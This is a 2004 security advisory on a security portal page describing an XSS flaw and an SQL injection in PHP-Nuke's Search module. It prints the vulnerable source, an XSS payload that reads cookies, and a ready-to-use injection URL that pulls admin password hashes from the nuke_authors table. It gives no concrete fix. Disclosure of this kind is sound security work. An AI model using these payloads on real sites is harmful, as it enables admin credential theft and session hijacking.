Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
February 9, 2010
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 urlaxe services
 y3dips ITsec
 Md5 Cracker
 plain-text.info
 LifeDork
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: Izzy_2o2
New Today: 4
New Yesterday: 6
Overall: 5899

People Online:
Visitors: 125
Members: 4
Total: 129

Online Now:
01: Izzy_2o2 - Your Account
02: Mooka91 - Forums
03: tb14 - Forums
04: vince213333 - Forums
milw0rm
·BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
·Joomla com_mytube (user_id) Blind SQL Injection Exploit
·Joomla com_jinc (newsid) Blind SQL Injection Vulnerability
·Snort < 2.8.5 Unified1 Output Denial of Service Exploit
·WX Guest Book 1.1.208 (SQL/XSS) Multiple Remote Vulnerabilities
·Loggix Project <= 9.4.5 Multiple Remote File Inclusion Vulnerabilities
·ProdLer <= 2.0 (prodler.class.php sPath) RFI Vulnerability
·CMScontrol 7.x (index.php id_menu) SQL Injection Vulnerability
·cP Creator 2.7.1 (Cookie tickets) Remote SQL Injection Exploit
·Winplot (.wp2 File) Local Buffer Overflow Exploit

read more...
PacketStorm News
·dradis-v2.5.0.tar.gz
·netsniff-ng-0.5.4.1.tar.g z
·CORE-2010-0121.txt
·flexmysql-sql.txt
·CORE-2010-0104.txt
·wippien-negotiation.txt
·mysql_yassl_getname.rb.tx t
·novelliprint_datetime.rb. txt
·novelliprint_target-frame .rb.txt
·deepburner_path.rb.txt

read more...
Security Basics
·Re: SMS Banking
·Re: SMS Banking
·Re: SMS Banking
·Re: Re: MSN virus
·Re: SMS Banking
·Re: MSN virus
·Re: SMS Banking
·Re: SMS Banking
·Re: Transparent vs Routed Firewall
·Re: Firewalking & Netcat & Statistics

read more...
[waraxe-2004-SA#035] - Multiple security holes in PhpNuke - part 2





Author: Janek Vind "waraxe"
Date: 17. July 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=35


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular freeware content management system, written in php by
Francisco Burzi. This CMS (Content Management System) is used on many thousands
websites, because it's freeware, easy to install and has broad set of features.

Homepage: http://phpnuke.org



Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This time we will look @ security holes - 1 XSS and 1 sql inject case -
in "Search" module.


A - Cross-site scripting aka XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A1 - xss in "/modules/Search/index.php":

Open search page in phpnuke:

http://localhost/nuke73/modules.php?name=Search

and enter to input field something like this:

1"><body onload="alert(document.cookie);

In case of other browsers than IE xss exploiting method can be modified, but one thing
is sure - xss case exists here...


B - Sql Injection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

B1 - critical sql injection case in "/modules/Search/index.php":

Well, let's look at source code from that script:

----------------[ original source ]-----------------
} elseif ($type == "comments" AND isset($sid)) {
$res = $db->sql_query("select title from ".$prefix."_stories where sid='$sid'");
list($st_title) = $db->sql_fetchrow($res);
$instory = "AND sid='$sid'";
echo "<center><font class="title"><b>"._SEARCHINSTORY." $st_title</b></font></center><br>";
} else {
echo "<center><font class="title"><b>"._SEARCHIN." $topictext</b></font></center><br>";
}
----------------[/original source ]-----------------

So - if search type is "comments" and there is no "sid" specified, then sql query
fragment "instory" is not initialized. Now, let's look further:


----------------[ original source ]-----------------
} elseif ($type=="comments") {
...
...
$result8 = $db->sql_query("SELECT tid, sid, subject, date, name from
".$prefix."_comments where (subject like '%$query%' OR comment like '%$query%')
$instory order by date DESC limit $min,$offset");
...
...
----------------[/original source ]-----------------

What is here, is a typical case of uninitialized variable - "instory".
It's time to turn this little bug to something evil:

----------------[ real life exploit ]---------------

http://localhost/nuke73/modules.php?name=Search&type=comments&
query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

----------------[/real life exploit ]---------------

... and we see all the secret information about admins :)

Have a nice day!


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Fixing tutorials, discussion, help - look at http://www.waraxe.us/forums.html

See ya there!


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to Raido Kerna and to http://www.gamecheaters.us staff!
Special greets to icenix and slimjim100!
Tervitused - Heintz ja Maku!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------









Copyright © by Waraxe IT Security Portal All Right Reserved.

Published on: 2005-01-06 (8806 reads)

[ Go Back ]
Top members by posts
waraxe  waraxe - 2315
pexli  pexli - 621
shai-tan  shai-tan - 477
LINUX  LINUX - 404
y3dips  y3dips - 281
lenny  lenny - 272
vince213333  vince213333 - 268
tehhunter  tehhunter - 259
SpyderMonkey  SpyderMonkey - 210
slimjim100  slimjim100 - 208

M$ Security Bulletins
Currently there is a problem with headlines from this site
News @ SecurityFocus
·News: Twitter attacker had proper credentials
·News: PhotoDNA scans images for child abuse
·News: Conficker data highlights infected networks
·News: Popular apps need better patching, says report
·Brief: Google offers bounty on browser bugs
·Brief: Cyberattacks from U.S. "greatest concern"
·Brief: Microsoft patches as fraudsters target IE flaw
·Brief: Attack on IE 0-day refined by researchers
·News: Most consumers reuse banking passwords
·News: CIA, PayPal under bizarre SSL assault

read more...
Vuln Watch
·VulnWatch

read more...
alexa
Incidents
·About
·
RSS
·
Archive
·
About
·
RSS
·
Archive
·
About
·
RSS
·
Archive
·
About

read more...



Hard drive recovery - Game Cheats - Book Reviews - Cisco VPN error 412
Harry Potter - Book Reviews - Old Science Books Online - Biographies Online Database
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2008 Janek Vind "waraxe"

Page Generation: 0.086 Seconds